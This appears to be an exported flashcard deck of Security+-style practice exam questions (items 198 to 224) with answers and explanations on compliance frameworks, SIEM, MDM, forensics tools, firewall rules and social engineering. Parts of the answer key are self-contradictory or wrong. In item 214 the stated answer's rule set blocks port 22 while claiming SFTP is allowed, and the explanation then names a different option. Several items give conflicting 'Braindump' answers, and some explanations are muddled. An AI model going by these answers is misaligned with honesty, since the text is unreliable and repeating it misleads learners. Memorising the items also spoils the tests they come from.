Integration and auditing: These are important for ensuring that systems work well together and for maintaining logs and records for compliance and monitoring. However, they do not directly address the need to optimize both performance and security across the network.

By implementing segmentation, the company can ensure that its network remains both secure and performs efficiently as it transitions services to the cloud and integrates the newly acquired companies.

(Braindump : d. Integration and auditing)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
198
Q

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team’s GREATEST concern?

a. PCI DSS
b. GDPR
c. ISO 27001
d. NIST CSF

A

a. PCI DSS

Explanation:

PCI DSS (Payment Card Industry Data Security Standard): This framework specifically addresses the security of cardholder data. One of its core requirements is the protection of stored cardholder data, which includes encrypting cardholder data at rest to ensure its confidentiality and integrity.

Why not the others?:

GDPR (General Data Protection Regulation): While GDPR emphasizes the protection of personal data and includes provisions for data encryption, its primary focus is on the privacy and rights of individuals in the European Union. It does not specifically target cardholder data security.
ISO 27001: This is an international standard for information security management systems (ISMS). While it provides a comprehensive framework for managing security risks and includes controls for data protection, it is not specifically focused on cardholder data.
NIST CSF (National Institute of Standards and Technology Cybersecurity Framework): This framework provides guidelines for managing and reducing cybersecurity risks but is more general in nature. It is not specifically designed to address the requirements for protecting cardholder data.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
199
Q

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?

a. Adjust the data flow from authentication sources to the SIEM.
b. Disable email alerting and review the SIEM directly.
c. Adjust the sensitivity levels of the SIEM correlation engine.
d. Utilize behavioral analysis to enable the SIEM’s learning mode.

A

d. Utilize behavioral analysis to enable the SIEM’s learning mode.

Explanation:

Utilize behavioral analysis to enable the SIEM's learning mode: This approach allows the SIEM to learn what constitutes normal behavior for users and systems over time. By establishing a baseline of normal operations, the SIEM can more effectively distinguish between typical activities and potential anomalies, thus reducing false positives and noise in the alerts.

Why not the others?:

Adjust the data flow from authentication sources to the SIEM: While this could help manage the volume of data, it does not address the issue of distinguishing between normal and malicious activities.
Disable email alerting and review the SIEM directly: This action only changes the method of alert notification and does not solve the problem of high alert volume or distinguishing between normal and malicious logins.
Adjust the sensitivity levels of the SIEM correlation engine: This might reduce the number of alerts, but it can also lead to missing important security events. It does not help in establishing what is normal behavior versus malicious activity.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
200
Q

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?

a. Employ different techniques for server- and client-side validations
b. Use a different version control system for third-party libraries
c. Implement a vulnerability scan to assess dependencies earlier on SDLC
d. Increase the number of penetration tests before software release

A

c. Implement a vulnerability scan to assess dependencies earlier in the SDLC

Explanation:

Implement a vulnerability scan to assess dependencies earlier in the SDLC: This approach involves scanning the third-party libraries for known vulnerabilities as part of the software development lifecycle (SDLC). By integrating vulnerability scanning tools early and throughout the development process, developers can identify and address security flaws in third-party dependencies before the software is released into production.

Why not the others?:

Employ different techniques for server- and client-side validations: While important for overall security, this practice focuses on input validation and does not specifically target security flaws in third-party libraries.
Use a different version control system for third-party libraries: Changing the version control system does not inherently address the security flaws in the libraries. The key is to identify vulnerabilities in the libraries themselves, not how they are managed.
Increase the number of penetration tests before software release: Penetration testing is valuable but typically occurs later in the SDLC and might not be as effective in identifying specific vulnerabilities in third-party libraries. Additionally, penetration tests are time-consuming and may miss some embedded library vulnerabilities that a dedicated vulnerability scan could catch earlier.

By implementing vulnerability scans to assess dependencies early and throughout the SDLC, you can effectively identify and mitigate security flaws in third-party libraries before they affect production environments.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
201
Q

Which of the following prevents an employee from seeing a colleague who is visiting an inappropriate website?

a. Job rotation policy
b. NDA
c. AUP
d. Separation of duties policy

A

c. AUP (Acceptable Use Policy)

Explanation:

Acceptable Use Policy (AUP): This policy outlines the acceptable and unacceptable use of an organization's IT resources. It sets clear guidelines for appropriate internet usage, which can include restrictions on accessing inappropriate websites. By enforcing an AUP, the organization can prevent employees from accessing inappropriate websites, thereby reducing the likelihood of others seeing such behavior.

Why not the others?:

Job rotation policy: This policy involves rotating employees through different jobs to reduce the risk of fraud and improve skills and knowledge. It does not directly address internet usage or prevent the visibility of inappropriate website visits.
NDA (Non-Disclosure Agreement): An NDA is a legal contract that prevents individuals from disclosing confidential information. It does not govern or prevent internet usage behavior within an organization.
Separation of duties policy: This policy ensures that no single individual has control over all aspects of a critical process, reducing the risk of fraud or error. It does not directly prevent inappropriate internet usage or visibility of such behavior.

An Acceptable Use Policy is the most relevant and effective measure to prevent employees from accessing inappropriate websites, thereby reducing the chance of others observing such behavior.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
202
Q

A user reports falling for a phishing email to an analyst. Which of the following system logs would the analyst check FIRST?

a. DNS
b. Message gateway
c. Network
d. Authentication

A

b. message gateway logs first.

Explanation:

Message Gateway Logs: These logs would provide information about incoming and outgoing emails, including details such as sender, recipient, subject, and attachments. They are crucial for identifying the phishing email itself, tracking its source, and potentially determining if similar emails were sent to other users.

Here’s why the other options are less likely the first choice:

DNS Logs: DNS logs primarily record DNS queries and responses, which are more useful for investigating domain resolution and network traffic patterns. They might not provide direct information about the phishing email content or delivery.

Network Logs: Network logs encompass a broad range of activities such as traffic flow, connections, and potentially malicious activities like command and control communications. While useful for broader network security investigations, they might not directly reveal details about the phishing email content.

Authentication Logs: Authentication logs track user login attempts and activities, which are important for investigating unauthorized access but are less relevant initially when dealing with a phishing incident where the focus is on the email and its handling.

Therefore, in the context of a user falling for a phishing email, checking the message gateway logs first would provide insights into the email’s characteristics, its delivery, and potentially aid in identifying further actions or communications related to the phishing incident.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
203
Q

An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. Which of the following vectors is being exploited?

a. Social media
b. Cloud
c. Supply chain
d. Social Engineering

A

c. supply chain.

Explanation:

Supply chain: This refers to the network of suppliers and vendors that provide goods and services to an organization. In the context of cybersecurity, supply chain attacks involve targeting third-party vendors or suppliers to gain unauthorized access to systems or data of the targeted organization. By compromising a vendor or supplier, attackers can infiltrate the organization's network through trusted relationships or software dependencies.

Here’s why the other options are not correct in this context:

Social media: While social media can be used in social engineering attacks to gather information or manipulate users, it's not directly related to infiltrating third-party software vendors unless specific social engineering tactics are used against individuals within those vendors.

Cloud: Cloud environments can be targeted in various ways, such as through misconfigurations or vulnerabilities, but this option doesn't directly address the tactic of infiltrating third-party vendors to impact operations.

Social engineering: While social engineering involves manipulating individuals to divulge confidential information, in this context, the focus is more on the organizational supply chain and not solely on manipulating individuals.

Therefore, the most appropriate answer in the given scenario where the attacker targets third-party software vendors to impact operations is supply chain.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
204
Q

An organization would like to give remote workers the ability to use applications hosted inside the corporate network. Users will be allowed to use their personal computers, or they will be provided organization assets. Either way, no data or applications will be installed locally on any user systems. Which of the following mobile solutions would accomplish these goals?

a. VDI
b. MDM
c. COPE
d. UTM

A

a. VDI (Virtual Desktop Infrastructure).

Explanation:

VDI (Virtual Desktop Infrastructure): VDI allows users to access virtualized desktops hosted on servers within the corporate network. Users connect to these desktops remotely from their personal devices or organization-provided assets through a client application or web browser. Applications and data remain centralized within the corporate network, and users interact with them through the virtual desktop interface. This approach ensures that no data or applications are installed locally on user systems, enhancing security and control over corporate data.

Let’s briefly review the other options to understand why they are not the best fit:

MDM (Mobile Device Management): MDM is primarily used for managing and securing mobile devices (smartphones, tablets) that access corporate resources. It involves enforcing policies, configuring settings, and securing data on mobile devices. However, it doesn't provide a mechanism for accessing applications hosted inside the corporate network without installing them locally.

COPE (Corporate-Owned, Personally-Enabled): COPE refers to a model where organizations provide employees with devices that are both owned and managed by the organization but can be used for personal purposes to some extent. It doesn't directly address the requirement of accessing applications without local installation on personal devices.

UTM (Unified Threat Management): UTM refers to a comprehensive security solution that integrates multiple security features such as firewall, antivirus, intrusion detection/prevention, etc. It is not specifically related to providing remote access to applications without local installation.

Therefore, VDI is the most appropriate choice for allowing remote workers to use applications hosted inside the corporate network without installing data or applications locally on any user systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
205
Q

Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?

a. Chain of custody
b. Legal hold
c. Event log
d. Artifacts

A

a. Chain of custody

Chain of custody refers to the documentation and processes used to establish the chronological history of evidence, from the moment it is collected to its presentation in legal proceedings. It ensures that the integrity of the evidence is preserved, showing who had custody of the evidence at any given time and what actions were performed with it. This documentation is crucial for proving the authenticity and admissibility of evidence in court or other legal proceedings.

b. Legal hold: While important for preserving potentially relevant data from being altered or destroyed, a legal hold specifically refers to preserving data that may be subject to litigation or investigation, rather than ensuring the admissibility of evidence in legal proceedings.

c. Event log: Event logs record system events and activities, which can be useful for forensic analysis and detecting security incidents. However, event logs themselves are not sufficient to ensure the admissibility of evidence in legal proceedings; they provide a record of events but do not establish the chain of custody required for legal validity.

d. Artifacts: Artifacts in cybersecurity refer to residual data left on a system after an activity has occurred. While artifacts can be valuable in investigations, they do not inherently ensure the admissibility of evidence. They are pieces of information that may corroborate findings but are not documentation of the custody of evidence.

Therefore, chain of custody is the correct answer because it specifically addresses the process of documenting and maintaining the integrity of evidence from collection through to presentation in legal contexts, ensuring its admissibility and reliability in court.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
206
Q

The Chief Information Security Officer (CISO) of a bank recently updated the incident response policy. The CISO is concerned that members of the incident response team do not understand their roles. The bank wants to test the policy but with the least amount of resources or impact. Which of the following BEST meets the requirements?

a. Warm site failover
b. Tabletop walk-through
c. Parallel path testing
d. Full outage simulation

A

b. Tabletop walk-through

Explanation:

Tabletop walk-through: This involves a simulated discussion of an incident scenario without actually executing any of the actions in the response plan. It allows team members to discuss their roles and responsibilities, evaluate the effectiveness of the policy, and identify any gaps or misunderstandings in a controlled environment. It requires minimal resources and does not disrupt normal operations.

The other options involve more significant resource allocation or potential disruption:

Warm site failover: This involves moving operations to a secondary site to simulate a disaster recovery scenario, which requires infrastructure and resources.

Parallel path testing: This tests redundant systems simultaneously to ensure they can handle workload if one path fails, which could impact production systems.

Full outage simulation: This simulates a complete outage scenario to test response and recovery procedures, which typically requires significant planning, resources, and disruption to normal operations.

Therefore, the tabletop walk-through is the most appropriate choice for testing the incident response policy in a low-impact manner while still achieving the goal of clarifying roles and responsibilities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
207
Q

Which of the following control types fixes a previously identified issue and mitigates a risk?

a. Detective
b. Corrective
c. Preventative
d. Finalized

A

b. Corrective

Explanation:

Corrective controls are designed to fix or remediate identified issues or vulnerabilities after they have been identified through monitoring or assessments. Their primary purpose is to mitigate risks by addressing the root cause of problems that have already been identified.

Let’s briefly differentiate it from the other options:

Detective controls (option a) are used to identify and detect deviations from established security policies, procedures, or controls. They do not directly fix issues but rather alert administrators or analysts to investigate and take corrective action.

Preventative controls (option c) are implemented to prevent or deter potential incidents or risks from occurring in the first place. They are proactive measures intended to reduce the likelihood or impact of security threats.

Finalized (option d) is not a recognized control type in the context of security controls.

Therefore, among the options provided, the control type that specifically addresses and mitigates identified risks by fixing underlying issues is corrective control (option b).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
208
Q

An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded a malicious file that was quarantined by the AV solution. The attacker utilized a local non-administrative account to restore the malicious file to a new location. The file was then used by another process to execute a payload.
Which of the following attacks did the analyst observe?

a. Privilege escalation
b. Request forgeries
c. Injection
d. Replay attack

A

Braindump : c. Injection

a. Privilege escalation

Explanation:

The attacker initially downloaded a malicious file, which was quarantined by the antivirus (AV) solution. This indicates the file was recognized as malicious, but the attacker managed to restore it.
The attacker then used a local non-administrative account to restore the file to a new location. This action suggests the attacker gained permissions or escalated privileges to bypass restrictions on executing the file.
Finally, the restored file was used by another process to execute a payload, leveraging the compromised privileges to carry out malicious actions.

In summary, this sequence of events describes an attack where the attacker escalated their privileges from a non-administrative account to restore and execute a malicious file, thereby achieving privilege escalation.

Injection: injection attacks involve inserting malicious code or commands into a system or application. This usually targets vulnerabilities in input fields or parameters. The scenario described does not involve injecting code into the system but rather manipulating and executing a quarantined file with escalated privileges.

Request forgeries (CSRF): Cross-Site Request Forgery (CSRF) involves tricking a user into performing actions they did not intend to do, typically on another website where they are authenticated. This attack is not relevant here as the scenario describes actions within the local system, not across different web applications.

Replay attack: In a replay attack, an attacker intercepts and reuses valid data transmissions between parties. This scenario does not involve replaying intercepted data; instead, it focuses on downloading, restoring, and executing a quarantined malicious file with escalated privileges.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
209
Q

A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this wireless network.
Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?

a. WPS
b. WPA2
c. WAP
d. HTTPS

A

b. WPA2 (Wi-Fi Protected Access 2).

Explanation

WPA2 (Wi-Fi Protected Access 2): This protocol provides strong encryption using the AES (Advanced Encryption Standard) algorithm, which is widely regarded as secure for protecting wireless networks. It offers better security than its predecessor, WPA, and should be used whenever possible to prevent unauthorized access and eavesdropping on wireless communications.

WPS (Wi-Fi Protected Setup): While WPS can simplify the process of connecting devices to a wireless network, it has known vulnerabilities and should generally be avoided or disabled if security is a primary concern.

WAP (Wireless Application Protocol): WAP is not an encryption protocol but rather a technical standard for accessing information over a wireless network. It is unrelated to securing wireless networks.

HTTPS (Hypertext Transfer Protocol Secure): HTTPS is a protocol used for secure communication over a computer network and is specifically designed for secure transmission of data over the internet, not for securing local wireless networks.

Therefore, WPA2 is the correct choice to ensure the strongest encryption and security for the wireless routers in the office suite, preventing unauthorized access from other tenants in the building.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
210
Q

An attacker browses a company’s online job board attempting to find any relevant information regarding the technologies the company uses. Which of the following BEST describes this social engineering technique?

a. Hoax
b. Reconnaissance
c. Impersonation
d. Pretexting

A

b. Reconnaissance.

Explanation:

Reconnaissance in the context of social engineering involves gathering information about a target organization or individual. This phase is typically part of the initial stages of an attack where the attacker collects data to understand the target's technology infrastructure, processes, employee details, or any other relevant information that can aid in planning an attack.

In this scenario, browsing the company's online job board to gather information about the technologies they use falls under reconnaissance. This information can be valuable for crafting targeted attacks or exploiting vulnerabilities related to specific technologies employed by the company.

a. Hoax: A hoax is a deceptive act intended to trick or deceive individuals or organizations into believing something false. It typically involves spreading false information or rumors with the intention of causing confusion or disruption rather than gathering information.

c. Impersonation: Impersonation involves pretending to be someone else, usually a trusted entity or individual, to deceive others into divulging sensitive information, granting access, or performing actions they wouldn’t otherwise do.

d. Pretexting: Pretexting is a social engineering technique where an attacker creates a fabricated scenario or pretext to manipulate individuals into disclosing information or performing actions they wouldn’t typically do under normal circumstances.

In contrast to reconnaissance, which focuses on gathering information about the target, the other options involve different methods of social engineering that are used at different stages of an attack. Reconnaissance is foundational for understanding the target environment before launching more specific attacks or crafting convincing social engineering scenarios.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
211
Q

During an incident response process involving a laptop, a host was identified as the entry point for malware. The management team would like to have the laptop restored and given back to the user. The cybersecurity analyst would like to continue investigating the intrusion on the host. Which of the following would allow the analyst to continue the investigation and also return the laptop to the user as soon as possible?

a. dd
b. memdump
c. tcpdump
d. head

A

a. dd

Here’s why:

dd: This command-line utility is used to create a bit-by-bit copy of an entire hard drive or a specific partition. By using dd, the cybersecurity analyst can create a full forensic image of the laptop's hard drive. This image can then be analyzed in detail without needing to keep the physical laptop. This allows the analyst to continue the investigation on the forensic image while the laptop is restored and returned to the user.

Let’s briefly review the other options:

memdump: This tool captures the contents of a computer's RAM. While useful for capturing volatile memory data, it does not provide a complete picture of the system's state and would not allow for a full investigation of the intrusion, especially if the analyst needs to examine files on the disk.

tcpdump: This tool captures network traffic. It is useful for network forensics but does not help in creating a copy of the laptop's hard drive for detailed analysis of the malware and its effects on the system.

head: This command is used to display the first few lines of a file. It is not relevant for creating forensic images or for detailed investigations.

Therefore, dd is the best option as it allows the analyst to create a complete forensic image of the laptop’s hard drive, enabling a thorough investigation while the laptop is restored and returned to the user.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
212
Q

An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the secure alternatives for replacing them? (Choose three.)

a. SFTP, FTPS
b. SNMPv2, SNMPv3
c. HTTP, HTTPS
d. TFTP, FTP
e. SNMPv1, SNMPv2
f. Telnet, SSH
g. TLS, SSL
h. POP, IMAP
i. Login, rlogin

A

b. SNMPv2, SNMPv3
c. HTTP, HTTPS
f. Telnet, SSH

Telnet, SSH:

Current: Telnet (port 23)
Secure Alternative: SSH (port 22)
Reason: Telnet sends data in clear text, while SSH encrypts the communication, providing confidentiality and integrity.

HTTP, HTTPS:

Current: HTTP (port 80)
Secure Alternative: HTTPS (port 443)
Reason: HTTPS uses SSL/TLS to encrypt HTTP traffic, protecting data from interception and tampering.

SNMPv1, SNMPv2, SNMPv3:

Current: SNMPv1 (port 161), SNMPv2 (port 161), SNMPv3 (port 161)
Secure Alternative: SNMPv3 (or SNMPv2c with strong community string management)
Reason: SNMPv3 provides encryption and authentication, addressing vulnerabilities present in SNMPv1 and SNMPv2.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
213
Q

A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how future incidents can be avoided. During which of the following stages of the response process will this activity take place?

a. Recovery
b. Identification
c. Lessons learned
d. Preparation

A

c. Lessons learned

During the Lessons learned stage, the security team and stakeholders analyze the incident response process. They document the incident timeline, actions taken, outcomes, and identify areas for improvement to prevent similar incidents in the future. This documentation helps enhance incident response procedures, update policies, and improve security posture based on the lessons derived from the incident.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
214
Q

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?

a. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Deny: Any Any 21
Deny: Any Any

b. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Deny: Any Any 22
Allow: Any Any 21
Deny: Any Any

c. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 22
Deny: Any Any 67
Deny: Any Any 68
Deny: Any Any 21
Allow: Any Any

d. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Deny: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Allow: Any Any 21
Allow: Any Any

A

a.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Deny: Any Any 22
Deny: Any Any 21
Deny: Any Any

Explanation:

Allow: Any Any 80: Allows access to web pages (HTTP).
Allow: Any Any 443: Allows access to web pages over HTTPS.
Allow: Any Any 67: Allows DHCP traffic (both UDP port 67 for server and 68 for client).
Allow: Any Any 68: Allows DHCP traffic (both UDP port 67 for server and 68 for client).
Deny: Any Any 22: Blocks SSH traffic, which is not listed as a permitted service.
Deny: Any Any 21: Specifically denies FTP traffic.
Deny: Any Any: Denies all other traffic implicitly that is not explicitly allowed.

This rule set ensures that only DHCP, web pages, and SFTP traffic is allowed, and FTP traffic is specifically blocked. Therefore, option b is the best choice to accomplish the stated goal.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
215
Q

While investigating a recent security incident, a security analyst decides to view all network connections on a particular server. Which of the following would provide the desired information?

a. arp
b. nslookup
c. netstat
d. nmap

A

c. netstat

Explanation:

netstat (network statistics) is a command-line tool that displays network connections (both incoming and outgoing), routing tables, interface statistics, masquerade connections, and multicast memberships.
By running netstat on a server, a security analyst can view active connections, listening ports, and related network details, which are crucial for investigating network activity during a security incident.

arp: The arp command (Address Resolution Protocol) displays and modifies entries in the Address Resolution Protocol (ARP) cache, which maps IP addresses to MAC addresses on a local network.

nslookup: The nslookup command is used to query DNS servers to obtain DNS-related information such as IP addresses corresponding to hostnames or vice versa.

nmap: The nmap command (Network Mapper) is a powerful network scanning tool used to discover hosts and services on a computer network, thus providing detailed information about the network.

While all these tools are useful in different scenarios for network investigations or troubleshooting, when specifically needing to view all network connections on a server, netstat is typically the tool of choice because it directly shows active connections and related network details on the local machine.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
216
Q

A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

a. Enable the remote-wiping option in the MDM software in case the phone is stolen.
b. Configure the MDM software to enforce the use of PINs to access the phone.
c. Configure MDM for FDE without enabling the lock screen.
d. Perform a factory reset on the phone before installing the company’s applications.

A

b. Configure the MDM software to enforce the use of PINs to access the phone.

Here’s why:

Enforcing PINs to access the phone: This measure ensures that the device is secured with a PIN, preventing unauthorized access to both personal and company data if the phone is lost or stolen. It addresses the security requirement without intruding into personal data or creating concerns about personal data loss.

Let’s briefly review the other options:

Enable the remote-wiping option in the MDM software in case the phone is stolen: While this is a strong security measure for protecting company data, it could lead to personal data loss, which is a primary concern for employees.

Configure MDM for FDE without enabling the lock screen: Full Disk Encryption (FDE) is a good security practice, but not enabling the lock screen would leave the device vulnerable to unauthorized access. Additionally, FDE by itself doesn’t address the concern of separating personal and corporate data.

Perform a factory reset on the phone before installing the company's applications: This would ensure a clean environment for corporate apps, but it would lead to the loss of all personal data on the phone, which is a significant concern for employees.

Therefore, configuring the MDM software to enforce the use of PINs to access the phone strikes a balance between securing company data and respecting employees’ concerns about their personal data.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
217
Q

The concept of connecting a user account across the systems of multiple enterprises is BEST known as:

a. federation.
b. a remote access policy.
c. multifactor authentication.
d. single sign-on.

A

a. federation.

Federation refers to the process of linking user identities and attributes across multiple identity management systems. It allows users to access multiple applications or services using a single set of credentials, which are often managed by their home organization. Federation enables seamless and secure access to resources across different domains or organizations without the need for users to have separate credentials for each system.

The other options provided are:

b. A remote access policy: Defines guidelines and rules for accessing a network or system remotely, typically focused on security and access control.

c. Multifactor authentication: Refers to the use of multiple authentication factors (such as passwords and biometrics) to verify a user's identity.

d. Single sign-on: Allows users to authenticate once and gain access to multiple applications or systems without re-entering credentials.

While single sign-on (SSO) is related to federation, federation specifically focuses on linking identities across different enterprises or domains, making a. federation the most appropriate answer in this context.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
218
Q

A user received an SMS on a mobile phone that asked for bank details. Which of the following social-engineering techniques was used in this case?

a. SPIM
b. Vishing
c. Spear phishing
d. Smishing

A

d. Smishing.

Explanation:

Smishing (SMS phishing) involves sending deceptive text messages to trick individuals into divulging sensitive information, clicking on malicious links, or downloading malicious attachments. In this scenario, the attacker used an SMS to impersonate a legitimate entity (such as a bank) to deceive the user into providing their bank details.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
219
Q

A company is working on mobile device security after a report revealed that users granted non-verified software access to corporate data. Which of the following is the MOST effective security control to mitigate this risk?

a. Block access to application stores
b. Implement OTA updates
c. Update the BYOD policy
d. Deploy a uniform firmware

A

c. Update the BYOD policy.

Explanation:

BYOD (Bring Your Own Device) policies govern how personal devices are used in the corporate environment, including access to corporate data and applications. Updating the BYOD policy to enforce stricter guidelines on software installation, verification, and access controls can help mitigate the risk of non-verified software accessing corporate data. This update can include requirements for using only approved applications or implementing mechanisms to prevent unauthorized software installation.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
220
Q

A security analyst needs to implement security features across smartphones, laptops, and tablets. Which of the following would be the MOST effective across heterogeneous platforms?

a. Enforcing encryption
b. Deploying GPOs
c. Removing administrative permissions
d. Applying MDM software

A

d. Applying MDM software.

Explanation:

MDM (Mobile Device Management) software provides a centralized solution to manage and secure mobile devices across different platforms, including smartphones, laptops, and tablets. MDM software allows the enforcement of security policies, application management, encryption, remote wipe capabilities, and compliance monitoring, making it the best choice for ensuring consistent security across heterogeneous devices.

Here’s a brief overview of why the other options are less suitable:

a. Enforcing encryption: While encryption is a critical security feature, it is only one aspect of device security. MDM software can enforce encryption policies along with other security settings.

b. Deploying GPOs (Group Policy Objects): GPOs are primarily used in Windows environments. While they can manage Windows-based laptops and desktops, they are not effective for managing non-Windows devices like smartphones and tablets.

c. Removing administrative permissions: Removing administrative permissions can enhance security, but it doesn't provide a comprehensive solution across different device types. MDM software can enforce this policy along with many other security configurations.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
221
Q

The new Chief Information Security Officer at a company has asked the security team to implement stronger user account policies. The new policies require:

-Users to choose a password unique to their last ten passwords
-Users to not log in from certain high-risk countries

Which of the following should the security team implement? (Choose two.)

a. Password complexity
b. Password history
c. Geolocation
d. Geofencing
e. Geotagging
f. Password reuse

A

b. Password history
d. Geofencing

Here’s why:

Password history: This policy ensures that users cannot reuse their last ten passwords, thereby enforcing the requirement for a unique password.

Geofencing: This security control restricts or allows access based on the user's geographic location. By implementing geofencing, the company can prevent logins from high-risk countries, as required by the new policies.

Let’s briefly review the other options:

Password complexity: While important for ensuring strong passwords, this does not address the specific requirement of preventing the reuse of the last ten passwords.

Geolocation: This involves determining the physical location of a user or device, which is useful but does not actively prevent logins from high-risk countries on its own.

Geotagging: This is the process of adding location data to digital content. It is not relevant to restricting logins based on location.

Password reuse: This term is related to the concept of password history but is not the actual policy or control used to enforce it.

Therefore, implementing password history and geofencing will effectively meet the new policies set by the Chief Information Security Officer.

(Braindump: b. Password history c. Geolocation)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
222
Q

Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?

a. SSAE SOC 2
b. PCI DSS
c. GDPR
d. ISO 31000

A

(Community : C 59%, A 41%)
Taken from Mike Meyers Security + 601 Cert Guide (pg 51):
“The GDPR in the European Union outlines in great detail how organizations should deal with private information…Many countries have subsequently adopted similar regulations, so naturally, many multinational corporations comply with those regulations throughout their organization. The DATA CONTROLLER controls the data, which sounds silly, but means the person must ensure that data complies with the protections of PII thoroughly, according to the regulations in the GDPR.

c. GDPR (General Data Protection Regulation)

The GDPR (General Data Protection Regulation) is a comprehensive data protection law in the European Union that outlines the roles and responsibilities of data controllers and data processors. It specifies requirements for how personal data should be processed, including the obligations and responsibilities of these entities in handling personal data. Therefore, GDPR is the regulation that is most likely to detail the roles and responsibilities of data controllers and data processors.

a. SSAE SOC 2 (Statement on Standards for Attestation Engagements No. 2): This is an auditing standard that focuses on controls relevant to the security, availability, processing integrity, confidentiality, and privacy of data processed by service providers.

b. PCI DSS (Payment Card Industry Data Security Standard): This standard applies to organizations that handle cardholder information for major debit, credit, prepaid, ATM, and POS cards. It focuses specifically on securing cardholder data to prevent fraud.

d. ISO 31000: This is an international standard for risk management that provides guidelines and principles for managing risks effectively in any organization.

Among these options, only GDPR specifically addresses the roles and responsibilities of data controllers and data processors within the context of personal data protection. Therefore, while the other standards and regulations focus on different aspects of security and risk management, GDPR is the most relevant to outline the roles and responsibilities of data controllers and processors

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
223
Q

Which of the following is MOST likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

a. An RTO report
b. A risk register
c. A business impact analysis
d. An asset value register
e. A disaster recovery plan

A

(Community : B 93%)
b. A risk register

Here’s why:

Risk Register: A risk register typically contains ranked and ordered information on various risks that may affect business processes and systems. It includes details on the likelihood and potential impact of these risks. After mitigating controls have been implemented, the risk register also highlights residual risks that need to be managed.

Let’s briefly review the other options for clarity:

RTO Report (Recovery Time Objective): This report focuses on the maximum acceptable downtime for recovering specific IT systems, applications, or business processes after a disruption.

Business Impact Analysis (BIA): A BIA assesses the potential impact of disruptions to critical business operations and identifies recovery priorities.

Asset Value Register: This typically lists the financial value and other attributes of organizational assets.

Disaster Recovery Plan: This plan outlines procedures for recovering and restoring IT systems and data in the event of a disaster.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
224
Q

A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would BEST prevent this type of attack?

a. Network location
b. Impossible travel time
c. Geolocation
d. Geofencing

A

b. Impossible travel time

Here’s why:

Impossible travel time: This policy detects and blocks login attempts that occur within an implausibly short time frame between two geographically distant locations. It assumes that the user cannot physically travel between these locations in such a short period. This policy helps prevent unauthorized access attempts that indicate account compromise or fraudulent activity, such as in the described scenario where a user logs in from France and then attempts a login from Brazil within seconds.

Let’s briefly review the other options for clarity:

Network location: This policy restricts access based on the network or IP address from which the login attempt originates. It may not be effective in preventing simultaneous logins from geographically distant locations if the IP addresses are within the allowed network range.

Geolocation: This policy allows or denies access based on the geographic location of the login attempt. While related, it may not detect or prevent rapid login attempts from different global locations within a short time.

Geofencing: This policy sets geographical boundaries within which a user is allowed to access certain resources or services. It doesn't directly prevent rapid and implausible travel between geographically distant locations in a short time frame.

Therefore, impossible travel time is the most suitable account policy to address and prevent the type of attack where a user account is compromised and login attempts are made from widely separated locations within an unreasonably short period.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
225
Q

